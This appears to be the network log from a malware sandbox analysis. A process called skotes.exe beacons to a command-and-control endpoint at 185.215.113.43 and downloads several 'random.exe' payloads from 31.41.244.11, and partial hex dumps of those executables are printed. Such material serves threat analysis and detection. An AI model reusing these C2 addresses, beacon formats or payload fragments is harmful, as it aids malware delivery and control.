                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.341069937 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:10 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 35 31 33 0d 0a 20 3c 63 3e 31 30 31 39 38 30 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 65 30 36 64 39 64 34 61 34 33 62 61 34 61 65 38 31 63 31 36 30 33 34 37 39 39 64 32 65 30 31 37 62 66 65 33 64 31 34 38 32 62 23 31 30 31 39 38 30 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 39 38 30 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 63 37 61 39 64 35 31 34 33 61 36 35 61 65 30 30 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 31 39 38 30 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 513 <c>1019800001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbe06d9d4a43ba4ae81c16034799d2e017bfe3d1482b#1019801001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1019802001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcc7a9d5143a65ae003564d5b9cd3e956b7b5d1#1019803001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd1779b464dac58eb03564d5b9cd3e956b7b5d1#1019804001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e80454db045e5404b5a0dc093f619bca9db5d60e66725#1019805001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1019806001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1019807001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1019808001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1019809001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca3080 [TRUNCATED]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.341134071 CET124INData Raw: 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 39 38 31 31 30 30 31 2b 2b 2b 66 63 38
                                                                                                                                                                                                                                                              Data Ascii: 9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1019811001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.575788975 CET130INData Raw: 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 39 38 31 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30
                                                                                                                                                                                                                                                              Data Ascii: 8fcf7b8c730804042ba5ce902415450#1019812001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.44976531.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.704891920 CET65OUTGET /files/Krokodyl02/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042447090 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:11 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2668544
                                                                                                                                                                                                                                                              Last-Modified: Sat, 21 Dec 2024 08:45:32 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "6766802c-28b800"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ca 47 72 61 ab 29 21 61 ab 29 21 61 ab 29 21 13 2a 2a 20 6c ab 29 21 13 2a 2c 20 f5 ab 29 21 13 2a 2d 20 72 ab 29 21 70 2d 2a 20 73 ab 29 21 70 2d 2d 20 71 ab 29 21 70 2d 2c 20 47 ab 29 21 13 2a 28 20 64 ab 29 21 61 ab 28 21 3f ab 29 21 e2 2d 21 20 60 ab 29 21 e2 2d d6 21 60 ab 29 21 e2 2d 2b 20 60 ab 29 21 52 69 63 68 61 ab 29 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f4 a8 65 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 aa 26 00 00 1c 02 00 00 00 00 00 50 a5 23 00 00 10 00 00 00 c0 26 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%Gra)!a)!a)!** l)!*, )!*- r)!p-* s)!p-- q)!p-, G)!*( d)!a(!?)!-! `)!-!`)!-+ `)!Richa)!PELeg*&P#&@)(@'<'}(j'T@'@&@.text&& `.rdata,&&@@.data''@.fptable''@.rsrc}''@@.relocj(lL(@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042486906 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 10 8b c1 69 4d 14 53 72 84 7a 89 45 fc c1 7d fc fd 98 01 05
                                                                                                                                                                                                                                                              Data Ascii: UiMSrzE}gB%f+gSVuW=4gEEiN=YiSrz=4g8{Muuabb}@M=4gUr2i]{/eMie+m~]yf[
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042541027 CET1236INData Raw: ea d2 27 57 73 e9 77 06 00 00 81 fb c1 d8 7b 2f 73 38 0f af 05 1c c9 67 00 8a 4d fc 80 c1 43 66 d3 3d 00 c9 67 00 a3 1c c9 67 00 b8 61 09 cf e9 2b c2 03 d8 b8 9b ff 00 00 2b 45 10 66 01 05 0c c9 67 00 33 d2 e9 37 06 00 00 81 f9 5e 77 a5 28 75 67
                                                                                                                                                                                                                                                              Data Ascii: 'Wsw{/s8gMCf=gga++Efg37^w(ugfEfLgm2MEgfgg,g-ggggiApO}+-gfH@rc?'fLg+E$:M8gg
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042712927 CET1236INData Raw: bb 47 00 00 98 01 05 24 c9 67 00 e9 9d 01 00 00 81 ff 66 af 48 40 75 2b 0f b6 05 03 c9 67 00 81 eb b6 2d be 49 0f b6 cb 81 c2 26 87 3c 64 0f af c8 81 6d 08 9f 86 1c 76 88 0d 03 c9 67 00 e9 6a 01 00 00 3b 5d 14 76 47 8b 45 14 01 15 30 c9 67 00 05
                                                                                                                                                                                                                                                              Data Ascii: G$gfH@u+g-I&<dmvgj;]vGE0gkU<gM;3GE@giE "-@qM-gE;3Gsu)gfc@gfHgAgeEgii^w(MgEeg~}
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042751074 CET1236INData Raw: b8 bc ba ff ff 2b c2 d3 fe 8b 4d f4 ba 0e 2a 01 db 0f b7 c0 89 85 44 ff ff ff a1 04 c9 67 00 89 85 7c ff ff ff 66 a1 00 c9 67 00 89 75 c4 66 89 45 e6 e9 19 01 00 00 01 15 30 c9 67 00 b8 22 7f 00 00 89 85 68 ff ff ff 81 c2 d8 47 f6 63 89 85 60 ff
                                                                                                                                                                                                                                                              Data Ascii: +M*Dg|fgufE0g"hGc`iUfHgimffPLfHgEQ}UfLgfETaEEfLgiU`TJ+Eagu``@TEE4[|i
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042784929 CET1236INData Raw: c0 89 45 84 89 85 70 ff ff ff 33 c0 89 45 a0 89 45 bc a0 02 c9 67 00 89 45 b8 8b 85 64 ff ff ff 89 85 6c ff ff ff 66 89 7d ee e9 c6 1f 00 00 3b 45 c0 0f 83 38 01 00 00 0f af 85 74 ff ff ff 81 e9 95 e2 56 0d 0f b7 35 10 c9 67 00 81 ea c8 74 01 36
                                                                                                                                                                                                                                                              Data Ascii: Ep3EEgEdlf};E8tV5gt6uE*HXEtEMEEEgEEI'5$gMM}m<M+UME|Mf(g+|}gf}gf+
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043080091 CET1236INData Raw: c8 8b 8d 54 ff ff ff 0f b7 c1 8b cf 69 c0 e5 5c 65 52 66 8b fb 2b f0 8b 85 50 ff ff ff 2a c2 d3 ee 2b 35 10 c9 67 00 8b 4d f4 d3 6d d8 89 85 50 ff ff ff a2 03 c9 67 00 a0 02 c9 67 00 89 45 b8 8b 85 64 ff ff ff 89 75 98 89 85 6c ff ff ff e9 cd 1a
                                                                                                                                                                                                                                                              Data Ascii: Ti\eRf+P*+5gMmPggEdulEU9HEE|EiEMmhEUi]gh`fEEf}LfEfMm[?<g=8g
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043117046 CET1120INData Raw: 01 45 ac 8b 85 6c ff ff ff 2d 7e 14 00 00 89 4d b8 89 85 6c ff ff ff 89 85 64 ff ff ff 0f b6 c1 8b 4d f4 2b d8 8b 45 90 03 05 3c c9 67 00 01 4d b0 2b cf 89 45 90 89 45 9c 8b 85 54 ff ff ff 89 5d e8 8b 5d fc 0f b7 c0 01 45 c0 81 c3 70 7d 00 00 66
                                                                                                                                                                                                                                                              Data Ascii: El-~MldM+E<gM+EET]]Ep}fEEUM]]f}`<;gh}iEx"j+MMM}m-MDEE MMEMM+EfM
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043232918 CET1236INData Raw: 89 7d f4 c7 45 d0 00 00 00 00 89 5d a4 89 5d fc 2b c2 c6 45 cc e5 0f b7 c0 89 45 a0 89 45 bc 8b 85 68 ff ff ff 2d 82 20 00 00 0f b7 d1 89 85 68 ff ff ff 66 8b cf 89 85 60 ff ff ff 66 8b fb b8 a0 69 00 00 c7 45 80 38 0f 8e 75 0f af d0 66 d3 ea 8b
                                                                                                                                                                                                                                                              Data Ascii: }E]]+EEEh- hf`fiE8ufTUEpkEk;<DufLf,gmLfHgE(UfI'fgEXX@giEh8uU
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043267965 CET1236INData Raw: 7c ff ff ff 89 45 e0 8b 85 50 ff ff ff 0f b6 d0 8b c2 d3 6d c0 0f af 45 94 69 c0 03 68 00 00 0f b7 c0 89 45 94 89 45 88 8b 85 6c ff ff ff 03 c6 89 85 6c ff ff ff 89 85 64 ff ff ff 0f b6 85 54 ff ff ff 02 45 a8 d2 e8 88 45 a8 8b 85 68 ff ff ff 03
                                                                                                                                                                                                                                                              Data Ascii: |EPmEihEElldTEEhU(U4h`;UEEEgm<EDNEmo|E|fMf}Eh+0g]\fMh`
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.162758112 CET1236INData Raw: 00 b8 bc ee 00 00 8b ca 89 45 84 d3 6d c0 0f bf 8d 60 ff ff ff 8b 55 f8 d3 ee 0f b7 4d bc 89 85 70 ff ff ff 81 c1 91 12 91 9e 0f bf 45 88 0f af f0 03 ce 2b 9d 68 ff ff ff 66 8b fb 89 4d f4 89 5d a4 89 5d fc 66 89 7d ee e9 f7 07 00 00 66 3b 7d 88
                                                                                                                                                                                                                                                              Data Ascii: Em`UMpE+hfM]]f}f;}=g+H&E4ggEEExUEE,g|Ehh`it=gEm uf+3Ef$


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.449785185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:18.699363947 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019800001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.050513029 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:19 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.44978731.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:20.352312088 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.680917025 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:21 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 776832
                                                                                                                                                                                                                                                              Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "6761482a-bda80"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.680958986 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681019068 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681057930 CET1236INData Raw: 8b 6c 24 0c 8d 74 24 14 c6 07 00 68 35 02 00 00 56 e8 6d fe ff ff 83 c4 08 89 c7 3b 44 24 48 75 1a 8b 44 1d 24 8b 4c 24 04 0f b7 04 01 8b 4c 1d 1c 01 d9 8b 04 81 89 04 24 eb 05 83 44 24 08 04 8b 44 24 28 83 f8 10 72 2d 8b 4c 24 14 8d 70 01 81 fe
                                                                                                                                                                                                                                                              Data Ascii: l$t$h5Vm;D$HuD$L$L$D$D$(r-L$prQ) sT$VQl$;|$HtD$$4$L$,10^_[]*-USWV$$$ WB1$1
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681097031 CET1236INData Raw: ff ff 83 ec 14 0f 28 05 10 c0 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 ab 01 00 00 89 c7 6a 00 50 ff 15 98 39 42 00 83 f8 ff 0f 84 70 01 00 00 89 c3 50 e8 1c 13 00 00 83 c4 04 89 c5 8d 44
                                                                                                                                                                                                                                                              Data Ascii: (AD$$D$D$jP9BpPD$jPSUW,:BBW49BE<L=l$$D$\$L$WD$ WD$Uv+w|$ D$$WUS`K
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681190968 CET672INData Raw: 08 89 f1 52 57 e8 0b 00 00 00 68 f8 41 42 00 56 e8 80 3f 00 00 56 89 ce 8b 44 24 0c ff 74 24 08 ff 70 04 ff 30 e8 f9 02 00 00 c7 06 10 c2 41 00 89 f0 5e c2 08 00 cc 57 56 89 ce 8b 7c 24 0c c7 01 28 c1 41 00 8d 41 04 31 c9 89 4e 08 89 4e 04 8d 4f
                                                                                                                                                                                                                                                              Data Ascii: RWhABV?VD$t$p0A^WV|$(AA1NNOPQEAGONFA^_WV|$(AA1NNOPQDAGONF\A^_WV|$(AA1NNOPQDAG
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681246042 CET1236INData Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89
                                                                                                                                                                                                                                                              Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681282997 CET1236INData Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64
                                                                                                                                                                                                                                                              Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681526899 CET448INData Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1
                                                                                                                                                                                                                                                              Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.681562901 CET1236INData Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31
                                                                                                                                                                                                                                                              Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:21.800932884 CET1236INData Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78
                                                                                                                                                                                                                                                              Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEY


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.449802185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:25.827198982 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019801001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.157696009 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.44980431.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:27.292627096 CET63OUTGET /files/geopoxid/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617867947 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:28 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 1861632
                                                                                                                                                                                                                                                              Last-Modified: Thu, 19 Dec 2024 20:35:58 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "676483ae-1c6800"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
